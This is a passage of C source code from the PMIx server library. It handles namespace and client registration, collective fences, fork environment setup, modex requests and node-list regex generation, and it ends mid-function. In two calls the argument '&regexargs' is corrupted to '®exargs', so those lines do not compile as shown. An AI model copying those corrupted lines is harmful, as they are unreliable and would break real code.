#ifdef HAVE_LIBEVENT_GLOBAL_SHUTDOWN
libevent_global_shutdown();
#endif
pmix_usock_finalize();
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
pmix_dstore_finalize();
#endif /* PMIX_ENABLE_DSTORE */
cleanup_server_state();
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server finalize complete");
return PMIX_SUCCESS;
}
static void _register_nspace(int sd, short args, void *cbdata)
{
pmix_setup_caddy_t *cd = (pmix_setup_caddy_t*)cbdata;
pmix_nspace_t *nptr, *tmp;
pmix_status_t rc;
size_t i, j, size;
int rank;
pmix_kval_t kv;
char **nodes=NULL, **procs=NULL;
pmix_buffer_t buf2;
pmix_info_t *iptr;
pmix_value_t val;
char *msg;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server _register_nspace");
/* see if we already have this nspace */
nptr = NULL;
PMIX_LIST_FOREACH(tmp, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(tmp->nspace, cd->proc.nspace)) {
nptr = tmp;
/* release any existing packed data - we will replace it */
if (0 < nptr->server->job_info.bytes_used) {
PMIX_DESTRUCT(&nptr->server->job_info);
PMIX_CONSTRUCT(&nptr->server->job_info, pmix_buffer_t);
}
break;
}
}
if (NULL == nptr) {
nptr = PMIX_NEW(pmix_nspace_t);
(void)strncpy(nptr->nspace, cd->proc.nspace, PMIX_MAX_NSLEN);
nptr->server = PMIX_NEW(pmix_server_nspace_t);
pmix_list_append(&pmix_globals.nspaces, &nptr->super);
}
nptr->server->nlocalprocs = cd->nlocalprocs;
/* see if we have everyone */
if (nptr->server->nlocalprocs == pmix_list_get_size(&nptr->server->ranks)) {
nptr->server->all_registered = true;
}
/* pack the name of the nspace */
msg = nptr->nspace;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&nptr->server->job_info, &msg, 1, PMIX_STRING))) {
PMIX_ERROR_LOG(rc);
pmix_list_remove_item(&pmix_globals.nspaces, &nptr->super);
PMIX_RELEASE(nptr);
goto release;
}
/* pack the provided info */
PMIX_CONSTRUCT(&kv, pmix_kval_t);
for (i=0; i < cd->ninfo; i++) {
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server _register_nspace recording %s",
cd->info[i].key);
if (0 == strcmp(cd->info[i].key, PMIX_NODE_MAP)) {
/* parse the regex to get the argv array of node names */
if (PMIX_SUCCESS != (rc = pmix_regex_parse_nodes(cd->info[i].value.data.string, &nodes))) {
PMIX_ERROR_LOG(rc);
continue;
}
/* if we have already found the proc map, then pass
* the detailed map */
if (NULL != procs) {
pmix_pack_proc_map(&nptr->server->job_info, nodes, procs);
pmix_argv_free(nodes);
nodes = NULL;
pmix_argv_free(procs);
procs = NULL;
}
} else if (0 == strcmp(cd->info[i].key, PMIX_PROC_MAP)) {
            /* parse the regex to get the argv array containing proc ranks on each node */
if (PMIX_SUCCESS != (rc = pmix_regex_parse_procs(cd->info[i].value.data.string, &procs))) {
PMIX_ERROR_LOG(rc);
continue;
}
/* if we have already recv'd the node map, then record
* the detailed map */
if (NULL != nodes) {
pmix_pack_proc_map(&nptr->server->job_info, nodes, procs);
pmix_argv_free(nodes);
nodes = NULL;
pmix_argv_free(procs);
procs = NULL;
}
} else if (0 == strcmp(cd->info[i].key, PMIX_PROC_DATA)) {
/* an array of data pertaining to a specific proc */
if (PMIX_DATA_ARRAY != cd->info[i].value.type ||
PMIX_INFO != cd->info[i].value.data.darray->type) {
PMIX_ERROR_LOG(PMIX_ERR_BAD_PARAM);
goto release;
}
size = cd->info[i].value.data.darray->size;
iptr = (pmix_info_t*)cd->info[i].value.data.darray->array;
PMIX_CONSTRUCT(&buf2, pmix_buffer_t);
/* first element of the array must be the rank */
if (0 != strcmp(iptr[0].key, PMIX_RANK)) {
PMIX_ERROR_LOG(PMIX_ERR_BAD_PARAM);
PMIX_DESTRUCT(&buf2);
goto release;
}
/* pack it separately */
rank = iptr[0].value.data.rank;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&buf2, &rank, 1, PMIX_PROC_RANK))) {
PMIX_ERROR_LOG(rc);
pmix_list_remove_item(&pmix_globals.nspaces, &nptr->super);
PMIX_RELEASE(nptr);
PMIX_DESTRUCT(&buf2);
goto release;
}
/* cycle thru the values for this rank and pack them */
for (j=1; j < size; j++) {
kv.key = iptr[j].key;
kv.value = &iptr[j].value;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&buf2, &kv, 1, PMIX_KVAL))) {
PMIX_ERROR_LOG(rc);
pmix_list_remove_item(&pmix_globals.nspaces, &nptr->super);
PMIX_RELEASE(nptr);
PMIX_DESTRUCT(&buf2);
goto release;
}
}
/* now add the blob */
kv.key = PMIX_PROC_BLOB;
kv.value = &val;
val.type = PMIX_BYTE_OBJECT;
val.data.bo.bytes = buf2.base_ptr;
val.data.bo.size = buf2.bytes_used;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&nptr->server->job_info, &kv, 1, PMIX_KVAL))) {
PMIX_ERROR_LOG(rc);
pmix_list_remove_item(&pmix_globals.nspaces, &nptr->super);
PMIX_RELEASE(nptr);
PMIX_DESTRUCT(&buf2);
goto release;
}
PMIX_DESTRUCT(&buf2);
} else {
/* just a value relating to the entire job */
kv.key = cd->info[i].key;
kv.value = &cd->info[i].value;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&nptr->server->job_info, &kv, 1, PMIX_KVAL))) {
PMIX_ERROR_LOG(rc);
pmix_list_remove_item(&pmix_globals.nspaces, &nptr->super);
PMIX_RELEASE(nptr);
goto release;
}
}
}
/* do not destruct the kv object - no memory leak will result */
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
if (0 > pmix_dstore_nspace_add(cd->proc.nspace)) {
PMIX_ERROR_LOG(rc);
goto release;
}
#endif
release:
if (NULL != nodes) {
pmix_argv_free(nodes);
}
if (NULL != procs) {
pmix_argv_free(procs);
}
if (NULL != cd->opcbfunc) {
cd->opcbfunc(rc, cd->cbdata);
}
PMIX_RELEASE(cd);
}
/* setup the data for a job */
PMIX_EXPORT pmix_status_t PMIx_server_register_nspace(const char nspace[], int nlocalprocs,
pmix_info_t info[], size_t ninfo,
pmix_op_cbfunc_t cbfunc, void *cbdata)
{
pmix_setup_caddy_t *cd;
cd = PMIX_NEW(pmix_setup_caddy_t);
(void)strncpy(cd->proc.nspace, nspace, PMIX_MAX_NSLEN);
cd->nlocalprocs = nlocalprocs;
cd->opcbfunc = cbfunc;
cd->cbdata = cbdata;
/* copy across the info array, if given */
if (0 < ninfo) {
cd->ninfo = ninfo;
cd->info = info;
}
/* we have to push this into our event library to avoid
* potential threading issues */
PMIX_THREADSHIFT(cd, _register_nspace);
return PMIX_SUCCESS;
}
static void _deregister_nspace(int sd, short args, void *cbdata)
{
pmix_setup_caddy_t *cd = (pmix_setup_caddy_t*)cbdata;
pmix_nspace_t *tmp;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server _deregister_nspace %s",
cd->proc.nspace);
/* see if we already have this nspace */
PMIX_LIST_FOREACH(tmp, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(tmp->nspace, cd->proc.nspace)) {
pmix_list_remove_item(&pmix_globals.nspaces, &tmp->super);
PMIX_RELEASE(tmp);
break;
}
}
if (NULL != cd->opcbfunc) {
cd->opcbfunc(PMIX_SUCCESS, cd->cbdata);
}
PMIX_RELEASE(cd);
}
PMIX_EXPORT void PMIx_server_deregister_nspace(const char nspace[],
pmix_op_cbfunc_t cbfunc,
void *cbdata)
{
pmix_setup_caddy_t *cd;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server deregister nspace %s",
nspace);
cd = PMIX_NEW(pmix_setup_caddy_t);
(void)strncpy(cd->proc.nspace, nspace, PMIX_MAX_NSLEN);
cd->opcbfunc = cbfunc;
cd->cbdata = cbdata;
/* we have to push this into our event library to avoid
* potential threading issues */
PMIX_THREADSHIFT(cd, _deregister_nspace);
}
void pmix_server_execute_collective(int sd, short args, void *cbdata)
{
pmix_trkr_caddy_t *tcd = (pmix_trkr_caddy_t*)cbdata;
pmix_server_trkr_t *trk = tcd->trk;
char *data = NULL;
size_t sz = 0;
pmix_buffer_t bucket, xfer;
pmix_rank_info_t *info;
pmix_value_t *val;
/* we don't need to check for non-NULL APIs here as
* that was already done when the tracker was created */
if (PMIX_FENCENB_CMD == trk->type) {
/* if the user asked us to collect data, then we have
* to provide any locally collected data to the host
* server so they can circulate it - only take data
* from the specified procs as not everyone is necessarily
* participating! And only take data intended for remote
* distribution as local data will be added when we send
* the result to our local clients */
PMIX_CONSTRUCT(&bucket, pmix_buffer_t);
assert( PMIX_COLLECT_MAX < UCHAR_MAX );
unsigned char tmp = (unsigned char)trk->collect_type;
pmix_bfrop.pack(&bucket, &tmp, 1, PMIX_BYTE);
if (PMIX_COLLECT_YES == trk->collect_type) {
pmix_buffer_t databuf;
PMIX_CONSTRUCT(&databuf, pmix_buffer_t);
pmix_output_verbose(2, pmix_globals.debug_output,
"fence - assembling data");
PMIX_LIST_FOREACH(info, &trk->ranks, pmix_rank_info_t) {
pmix_buffer_t rankbuf;
PMIX_CONSTRUCT(&rankbuf, pmix_buffer_t);
/* get any remote contribution - note that there
* may not be a contribution */
if (PMIX_SUCCESS == pmix_hash_fetch(&info->nptr->server->myremote, info->rank, "modex", &val) &&
NULL != val) {
/* pack the proc so we know the source */
char *foobar = info->nptr->nspace;
pmix_bfrop.pack(&rankbuf, &foobar, 1, PMIX_STRING);
pmix_bfrop.pack(&rankbuf, &info->rank, 1, PMIX_PROC_RANK);
PMIX_CONSTRUCT(&xfer, pmix_buffer_t);
PMIX_LOAD_BUFFER(&xfer, val->data.bo.bytes, val->data.bo.size);
PMIX_VALUE_RELEASE(val);
pmix_buffer_t *pxfer = &xfer;
pmix_bfrop.pack(&rankbuf, &pxfer, 1, PMIX_BUFFER);
PMIX_DESTRUCT(&xfer);
/* now pack this proc's contribution into the bucket */
pmix_buffer_t *pdatabuf = &rankbuf;
pmix_bfrop.pack(&databuf, &pdatabuf, 1, PMIX_BUFFER);
}
PMIX_DESTRUCT(&rankbuf);
}
// TODO: we have multiple data movings while only one is actually need
pmix_buffer_t *pbkt = &databuf;
pmix_bfrop.pack(&bucket, &pbkt, 1, PMIX_BUFFER);
PMIX_DESTRUCT(&databuf);
}
PMIX_UNLOAD_BUFFER(&bucket, data, sz);
PMIX_DESTRUCT(&bucket);
pmix_host_server.fence_nb(trk->pcs, trk->npcs,
trk->info, trk->ninfo,
data, sz, trk->modexcbfunc, trk);
} else if (PMIX_CONNECTNB_CMD == trk->type) {
pmix_host_server.connect(trk->pcs, trk->npcs,
trk->info, trk->ninfo,
trk->op_cbfunc, trk);
} else if (PMIX_DISCONNECTNB_CMD == trk->type) {
pmix_host_server.disconnect(trk->pcs, trk->npcs,
trk->info, trk->ninfo,
trk->op_cbfunc, trk);
} else {
/* unknown type */
PMIX_ERROR_LOG(PMIX_ERR_NOT_FOUND);
pmix_list_remove_item(&pmix_server_globals.collectives, &trk->super);
PMIX_RELEASE(trk);
}
PMIX_RELEASE(tcd);
}
static void _register_client(int sd, short args, void *cbdata)
{
pmix_setup_caddy_t *cd = (pmix_setup_caddy_t*)cbdata;
pmix_rank_info_t *info, *iptr, *iptr2;
pmix_nspace_t *nptr, *tmp;
pmix_server_trkr_t *trk;
pmix_trkr_caddy_t *tcd;
bool all_def;
size_t i;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server _register_client for nspace %s rank %d",
cd->proc.nspace, cd->proc.rank);
/* see if we already have this nspace */
nptr = NULL;
PMIX_LIST_FOREACH(tmp, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(tmp->nspace, cd->proc.nspace)) {
nptr = tmp;
break;
}
}
if (NULL == nptr) {
nptr = PMIX_NEW(pmix_nspace_t);
(void)strncpy(nptr->nspace, cd->proc.nspace, PMIX_MAX_NSLEN);
/* add the server object */
nptr->server = PMIX_NEW(pmix_server_nspace_t);
pmix_list_append(&pmix_globals.nspaces, &nptr->super);
}
/* setup a peer object for this client - since the host server
* only deals with the original processes and not any clones,
* we know this function will be called only once per rank */
info = PMIX_NEW(pmix_rank_info_t);
PMIX_RETAIN(nptr);
info->nptr = nptr;
info->rank = cd->proc.rank;
info->uid = cd->uid;
info->gid = cd->gid;
info->server_object = cd->server_object;
pmix_list_append(&nptr->server->ranks, &info->super);
/* see if we have everyone */
if (nptr->server->nlocalprocs == pmix_list_get_size(&nptr->server->ranks)) {
nptr->server->all_registered = true;
/* check any pending trackers to see if they are
* waiting for us. There is a slight race condition whereby
* the host server could have spawned the local client and
* it called back into the collective -before- our local event
* would fire the register_client callback. Deal with that here. */
PMIX_LIST_FOREACH(trk, &pmix_server_globals.collectives, pmix_server_trkr_t) {
/* if this tracker is already complete, then we
* don't need to update it */
if (trk->def_complete) {
continue;
}
/* see if any of our procs are involved - the tracker will
* have been created because a callback was received, but
* no rank info will have been entered since the clients
* had not yet been registered. Thus, we couldn't enter rank
* objects into the tracker as we didn't know which
* of the ranks were local */
for (i=0; i < trk->npcs; i++) {
if (0 != strncmp(cd->proc.nspace, trk->pcs[i].nspace, PMIX_MAX_NSLEN)) {
continue;
}
/* need to check if this rank is one of mine */
PMIX_LIST_FOREACH(iptr, &nptr->server->ranks, pmix_rank_info_t) {
if (PMIX_RANK_WILDCARD == trk->pcs[i].rank ||
iptr->rank == trk->pcs[i].rank) {
/* add a tracker for this proc - don't need more than
* the nspace pointer and rank */
iptr2 = PMIX_NEW(pmix_rank_info_t);
PMIX_RETAIN(info->nptr);
iptr2->nptr = info->nptr;
iptr2->rank = info->rank;
pmix_list_append(&trk->ranks, &iptr2->super);
/* track the count */
++trk->nlocal;
}
}
}
/* we need to know if this tracker is now complete - the only
* way to do this is to check if all participating
* nspaces are fully registered */
all_def = true;
/* search all the involved procs - fortunately, this
* list is usually very small */
PMIX_LIST_FOREACH(iptr, &trk->ranks, pmix_rank_info_t) {
if (!iptr->nptr->server->all_registered) {
/* nope */
all_def = false;
break;
}
}
/* update this tracker's status */
trk->def_complete = all_def;
/* is this now completed? */
if (trk->def_complete && pmix_list_get_size(&trk->local_cbs) == trk->nlocal) {
/* it did, so now we need to process it
* we don't want to block someone
* here, so kick any completed trackers into a
* new event for processing */
PMIX_EXECUTE_COLLECTIVE(tcd, trk, pmix_server_execute_collective);
}
}
/* also check any pending local modex requests to see if
* someone has been waiting for a request on a remote proc
* in one of our nspaces, but we didn't know all the local procs
* and so couldn't determine the proc was remote */
pmix_pending_nspace_requests(nptr);
}
/* let the caller know we are done */
if (NULL != cd->opcbfunc) {
cd->opcbfunc(PMIX_SUCCESS, cd->cbdata);
}
PMIX_RELEASE(cd);
}
PMIX_EXPORT pmix_status_t PMIx_server_register_client(const pmix_proc_t *proc,
uid_t uid, gid_t gid, void *server_object,
pmix_op_cbfunc_t cbfunc, void *cbdata)
{
pmix_setup_caddy_t *cd;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server register client %s:%d",
proc->nspace, proc->rank);
cd = PMIX_NEW(pmix_setup_caddy_t);
(void)strncpy(cd->proc.nspace, proc->nspace, PMIX_MAX_NSLEN);
cd->proc.rank = proc->rank;
cd->uid = uid;
cd->gid = gid;
cd->server_object = server_object;
cd->opcbfunc = cbfunc;
cd->cbdata = cbdata;
/* we have to push this into our event library to avoid
* potential threading issues */
PMIX_THREADSHIFT(cd, _register_client);
return PMIX_SUCCESS;
}
static void _deregister_client(int sd, short args, void *cbdata)
{
pmix_setup_caddy_t *cd = (pmix_setup_caddy_t*)cbdata;
pmix_rank_info_t *info;
pmix_nspace_t *nptr, *tmp;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server _deregister_client for nspace %s rank %d",
cd->proc.nspace, cd->proc.rank);
/* see if we already have this nspace */
nptr = NULL;
PMIX_LIST_FOREACH(tmp, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(tmp->nspace, cd->proc.nspace)) {
nptr = tmp;
break;
}
}
if (NULL == nptr) {
/* nothing to do */
goto cleanup;
}
    /* find and remove this client */
PMIX_LIST_FOREACH(info, &nptr->server->ranks, pmix_rank_info_t) {
if (info->rank == cd->proc.rank) {
pmix_list_remove_item(&nptr->server->ranks, &info->super);
PMIX_RELEASE(info);
break;
}
}
cleanup:
if (NULL != cd->opcbfunc) {
cd->opcbfunc(PMIX_SUCCESS, cd->cbdata);
}
PMIX_RELEASE(cd);
}
PMIX_EXPORT void PMIx_server_deregister_client(const pmix_proc_t *proc,
pmix_op_cbfunc_t cbfunc, void *cbdata)
{
pmix_setup_caddy_t *cd;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server deregister client %s:%d",
proc->nspace, proc->rank);
cd = PMIX_NEW(pmix_setup_caddy_t);
(void)strncpy(cd->proc.nspace, proc->nspace, PMIX_MAX_NSLEN);
cd->proc.rank = proc->rank;
cd->opcbfunc = cbfunc;
cd->cbdata = cbdata;
/* we have to push this into our event library to avoid
* potential threading issues */
PMIX_THREADSHIFT(cd, _deregister_client);
}
/* setup the envars for a child process */
PMIX_EXPORT pmix_status_t PMIx_server_setup_fork(const pmix_proc_t *proc, char ***env)
{
char rankstr[128];
pmix_listener_t *lt;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server setup_fork for nspace %s rank %d",
proc->nspace, proc->rank);
/* pass the nspace */
pmix_setenv("PMIX_NAMESPACE", proc->nspace, true, env);
/* pass the rank */
(void)snprintf(rankstr, 127, "%d", proc->rank);
pmix_setenv("PMIX_RANK", rankstr, true, env);
/* pass our rendezvous info */
PMIX_LIST_FOREACH(lt, &pmix_server_globals.listeners, pmix_listener_t) {
if (NULL != lt->uri && NULL != lt->varname) {
pmix_setenv(lt->varname, lt->uri, true, env);
}
}
/* pass our active security mode */
pmix_setenv("PMIX_SECURITY_MODE", security_mode, true, env);
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
/* pass dstore path to files */
pmix_dstore_patch_env(env);
#endif
return PMIX_SUCCESS;
}
/***************************************************************************************************
* Support calls from the host server down to us requesting direct modex data provided by one *
* of our local clients *
***************************************************************************************************/
static void _dmodex_req(int sd, short args, void *cbdata)
{
pmix_setup_caddy_t *cd = (pmix_setup_caddy_t*)cbdata;
pmix_rank_info_t *info, *iptr;
pmix_nspace_t *nptr, *ns;
pmix_buffer_t pbkt;
pmix_value_t *val;
char *data = NULL;
size_t sz = 0;
pmix_dmdx_remote_t *dcd;
pmix_status_t rc;
pmix_output_verbose(2, pmix_globals.debug_output,
"DMODX LOOKING FOR %s:%d",
cd->proc.nspace, cd->proc.rank);
/* this should be one of my clients, but a race condition
* could cause this request to arrive prior to us having
* been informed of it - so first check to see if we know
* about this nspace yet */
nptr = NULL;
PMIX_LIST_FOREACH(ns, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(ns->nspace, cd->proc.nspace)) {
nptr = ns;
break;
}
}
if (NULL == nptr) {
/* we don't know this namespace yet, and so we obviously
* haven't received the data from this proc yet - defer
* the request until we do */
dcd = PMIX_NEW(pmix_dmdx_remote_t);
PMIX_RETAIN(cd);
dcd->cd = cd;
pmix_list_append(&pmix_server_globals.remote_pnd, &dcd->super);
cd->active = false; // ensure the request doesn't hang
return;
}
/* see if we have this peer in our list */
info = NULL;
PMIX_LIST_FOREACH(iptr, &nptr->server->ranks, pmix_rank_info_t) {
if (iptr->rank == cd->proc.rank) {
info = iptr;
break;
}
}
if (NULL == info) {
/* rank isn't known yet - defer
* the request until we do */
dcd = PMIX_NEW(pmix_dmdx_remote_t);
PMIX_RETAIN(cd);
dcd->cd = cd;
pmix_list_append(&pmix_server_globals.remote_pnd, &dcd->super);
cd->active = false; // ensure the request doesn't hang
return;
}
/* have we received the modex from this proc yet - if
* not, then defer */
if (!info->modex_recvd) {
/* track the request so we can fulfill it once
* data is recvd */
dcd = PMIX_NEW(pmix_dmdx_remote_t);
PMIX_RETAIN(cd);
dcd->cd = cd;
pmix_list_append(&pmix_server_globals.remote_pnd, &dcd->super);
cd->active = false; // ensure the request doesn't hang
return;
}
/* collect the remote/global data from this proc */
PMIX_CONSTRUCT(&pbkt, pmix_buffer_t);
/* get any remote contribution - note that there
* may not be a contribution */
if (PMIX_SUCCESS == (rc = pmix_hash_fetch(&nptr->server->myremote, info->rank, "modex", &val)) &&
NULL != val) {
data = val->data.bo.bytes;
sz = val->data.bo.size;
/* protect the data */
val->data.bo.bytes = NULL;
val->data.bo.size = 0;
PMIX_VALUE_RELEASE(val);
}
/* execute the callback */
cd->cbfunc(rc, data, sz, cd->cbdata);
if (NULL != data) {
free(data);
}
cd->active = false;
}
PMIX_EXPORT pmix_status_t PMIx_server_dmodex_request(const pmix_proc_t *proc,
pmix_dmodex_response_fn_t cbfunc,
void *cbdata)
{
pmix_setup_caddy_t *cd;
/* protect against bozo */
if (NULL == cbfunc || NULL == proc) {
return PMIX_ERR_BAD_PARAM;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server register client %s:%d",
proc->nspace, proc->rank);
cd = PMIX_NEW(pmix_setup_caddy_t);
(void)strncpy(cd->proc.nspace, proc->nspace, PMIX_MAX_NSLEN);
cd->proc.rank = proc->rank;
cd->cbfunc = cbfunc;
cd->cbdata = cbdata;
/* we have to push this into our event library to avoid
* potential threading issues */
PMIX_THREADSHIFT(cd, _dmodex_req);
PMIX_WAIT_FOR_COMPLETION(cd->active);
PMIX_RELEASE(cd);
return PMIX_SUCCESS;
}
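/* event-shifted handler for PMIx_Store_internal - locate the target
 * nspace and store the provided key/value pair in its internal hash */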
static void _store_internal(int sd, short args, void *cbdata)
{
pmix_shift_caddy_t *cd = (pmix_shift_caddy_t*)cbdata;
pmix_nspace_t *ns, *nsptr;
ns = NULL;
PMIX_LIST_FOREACH(nsptr, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strncmp(cd->nspace, nsptr->nspace, PMIX_MAX_NSLEN)) {
ns = nsptr;
break;
}
}
if (NULL == ns) {
/* shouldn't be possible */
cd->status = PMIX_ERR_NOT_FOUND;
} else {
cd->status = pmix_hash_store(&ns->internal, cd->rank, cd->kv);
}
cd->active = false;
}
PMIX_EXPORT pmix_status_t PMIx_Store_internal(const pmix_proc_t *proc,
const char *key, pmix_value_t *val)
{
pmix_shift_caddy_t *cd;
pmix_status_t rc;
/* setup to thread shift this request */
cd = PMIX_NEW(pmix_shift_caddy_t);
cd->nspace = proc->nspace;
cd->rank = proc->rank;
cd->kv = PMIX_NEW(pmix_kval_t);
cd->kv->key = strdup((char*)key);
cd->kv->value = (pmix_value_t*)malloc(sizeof(pmix_value_t));
rc = pmix_value_xfer(cd->kv->value, val);
if (PMIX_SUCCESS != rc) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(cd);
return rc;
}
if (pmix_globals.server) {
PMIX_THREADSHIFT(cd, _store_internal);
PMIX_WAIT_FOR_COMPLETION(cd->active);
} else {
_store_internal(0, 0, cd);
}
rc = cd->status;
PMIX_RELEASE(cd);
return rc;
}
#define PMIX_MAX_NODE_PREFIX 50
PMIX_EXPORT pmix_status_t PMIx_generate_regex(const char *input, char **regexp)
{
char *vptr, *vsave;
char prefix[PMIX_MAX_NODE_PREFIX];
int i, j, len, startnum, vnum, numdigits;
bool found, fullval;
char *suffix, *sfx;
pmix_regex_value_t *vreg;
pmix_regex_range_t *range;
pmix_list_t vids;
char **regexargs = NULL, *tmp, *tmp2;
char *cptr;
/* define the default */
*regexp = NULL;
/* setup the list of results */
PMIX_CONSTRUCT(&vids, pmix_list_t);
/* cycle thru the array of input values - first copy
     * it so we don't overwrite what we were given */
vsave = strdup(input);
vptr = vsave;
while (NULL != (cptr = strchr(vptr, ',')) || 0 < strlen(vptr)) {
if (NULL != cptr) {
*cptr = '\0';
}
/* determine this node's prefix by looking for first non-alpha char */
fullval = false;
len = strlen(vptr);
startnum = -1;
memset(prefix, 0, PMIX_MAX_NODE_PREFIX);
numdigits = 0;
for (i=0, j=0; i < len; i++) {
if (!isalpha(vptr[i])) {
/* found a non-alpha char */
if (!isdigit(vptr[i])) {
/* if it is anything but a digit, we just use
* the entire name
*/
fullval = true;
break;
}
/* count the size of the numeric field - but don't
* add the digits to the prefix
*/
numdigits++;
if (startnum < 0) {
/* okay, this defines end of the prefix */
startnum = i;
}
continue;
}
if (startnum < 0) {
prefix[j++] = vptr[i];
}
}
if (fullval || startnum < 0) {
/* can't compress this name - just add it to the list */
vreg = PMIX_NEW(pmix_regex_value_t);
vreg->prefix = strdup(vptr);
pmix_list_append(&vids, &vreg->super);
/* move to the next posn */
if (NULL == cptr) {
break;
}
vptr = cptr + 1;
continue;
}
/* convert the digits and get any suffix */
vnum = strtol(&vptr[startnum], &sfx, 10);
if (NULL != sfx) {
suffix = strdup(sfx);
} else {
suffix = NULL;
}
/* is this value already on our list? */
found = false;
PMIX_LIST_FOREACH(vreg, &vids, pmix_regex_value_t) {
if (0 < strlen(prefix) && NULL == vreg->prefix) {
continue;
}
if (0 == strlen(prefix) && NULL != vreg->prefix) {
continue;
}
if (0 < strlen(prefix) && NULL != vreg->prefix
&& 0 != strcmp(prefix, vreg->prefix)) {
continue;
}
if (NULL == suffix && NULL != vreg->suffix) {
continue;
}
if (NULL != suffix && NULL == vreg->suffix) {
continue;
}
if (NULL != suffix && NULL != vreg->suffix &&
0 != strcmp(suffix, vreg->suffix)) {
continue;
}
if (numdigits != vreg->num_digits) {
continue;
}
/* found a match - flag it */
found = true;
/* get the last range on this nodeid - we do this
* to preserve order
*/
range = (pmix_regex_range_t*)pmix_list_get_last(&vreg->ranges);
if (NULL == range) {
/* first range for this value */
range = PMIX_NEW(pmix_regex_range_t);
range->start = vnum;
range->cnt = 1;
pmix_list_append(&vreg->ranges, &range->super);
break;
}
/* see if the value is out of sequence */
if (vnum != (range->start + range->cnt)) {
/* start a new range */
range = PMIX_NEW(pmix_regex_range_t);
range->start = vnum;
range->cnt = 1;
pmix_list_append(&vreg->ranges, &range->super);
break;
}
/* everything matches - just increment the cnt */
range->cnt++;
break;
}
if (!found) {
/* need to add it */
vreg = PMIX_NEW(pmix_regex_value_t);
if (0 < strlen(prefix)) {
vreg->prefix = strdup(prefix);
}
if (NULL != suffix) {
vreg->suffix = strdup(suffix);
}
vreg->num_digits = numdigits;
pmix_list_append(&vids, &vreg->super);
/* record the first range for this value - we took
* care of values we can't compress above
*/
range = PMIX_NEW(pmix_regex_range_t);
range->start = vnum;
range->cnt = 1;
pmix_list_append(&vreg->ranges, &range->super);
}
if (NULL != suffix) {
free(suffix);
}
/* move to the next posn */
if (NULL == cptr) {
break;
}
vptr = cptr + 1;
}
free(vsave);
/* begin constructing the regular expression */
while (NULL != (vreg = (pmix_regex_value_t*)pmix_list_remove_first(&vids))) {
/* if no ranges, then just add the name */
if (0 == pmix_list_get_size(&vreg->ranges)) {
if (NULL != vreg->prefix) {
/* solitary value */
if (0 > asprintf(&tmp, "%s", vreg->prefix)) {
return PMIX_ERR_NOMEM;
}
pmix_argv_append_nosize(®exargs, tmp);
free(tmp);
}
PMIX_RELEASE(vreg);
continue;
}
/* start the regex for this value with the prefix */
if (NULL != vreg->prefix) {
if (0 > asprintf(&tmp, "%s[%d:", vreg->prefix, vreg->num_digits)) {
return PMIX_ERR_NOMEM;
}
} else {
if (0 > asprintf(&tmp, "[%d:", vreg->num_digits)) {
return PMIX_ERR_NOMEM;
}
}
/* add the ranges */
while (NULL != (range = (pmix_regex_range_t*)pmix_list_remove_first(&vreg->ranges))) {
if (1 == range->cnt) {
if (0 > asprintf(&tmp2, "%s%d,", tmp, range->start)) {
return PMIX_ERR_NOMEM;
}
} else {
if (0 > asprintf(&tmp2, "%s%d-%d,", tmp, range->start, range->start + range->cnt - 1)) {
return PMIX_ERR_NOMEM;
}
}
free(tmp);
tmp = tmp2;
PMIX_RELEASE(range);
}
/* replace the final comma */
tmp[strlen(tmp)-1] = ']';
if (NULL != vreg->suffix) {
/* add in the suffix, if provided */
if (0 > asprintf(&tmp2, "%s%s", tmp, vreg->suffix)) {
return PMIX_ERR_NOMEM;
}
free(tmp);
tmp = tmp2;
}
pmix_argv_append_nosize(®exargs, tmp);
free(tmp);
PMIX_RELEASE(vreg);
}
/* assemble final result */
tmp = pmix_argv_join(regexargs, ',');
if (0 > asprintf(regexp, "pmix[%s]", tmp)) {
return PMIX_ERR_NOMEM;
}
free(tmp);
/* cleanup */
pmix_argv_free(regexargs);
PMIX_DESTRUCT(&vids);
return PMIX_SUCCESS;
}
PMIX_EXPORT pmix_status_t PMIx_generate_ppn(const char *input, char **regexp)
{
char **ppn, **npn;
int i, j, start, end;
pmix_regex_value_t *vreg;
pmix_regex_range_t *rng;
pmix_list_t nodes;
char *tmp, *tmp2;
char *cptr;
/* define the default */
*regexp = NULL;
/* setup the list of results */
PMIX_CONSTRUCT(&nodes, pmix_list_t);
/* split the input by node */
ppn = pmix_argv_split(input, ';');
/* for each node, split the input by comma */
for (i=0; NULL != ppn[i]; i++) {
rng = NULL;
/* create a record for this node */
vreg = PMIX_NEW(pmix_regex_value_t);
pmix_list_append(&nodes, &vreg->super);
/* split the input for this node */
npn = pmix_argv_split(ppn[i], ',');
/* look at each element */
for (j=0; NULL != npn[j]; j++) {
/* is this a range? */
if (NULL != (cptr = strchr(npn[j], '-'))) {
/* terminate the string */
*cptr = '\0';
++cptr;
start = strtol(npn[j], NULL, 10);
end = strtol(cptr, NULL, 10);
/* are we collecting a range? */
if (NULL == rng) {
/* no - better start one */
rng = PMIX_NEW(pmix_regex_range_t);
rng->start = start;
rng->cnt = end - start + 1;
pmix_list_append(&vreg->ranges, &rng->super);
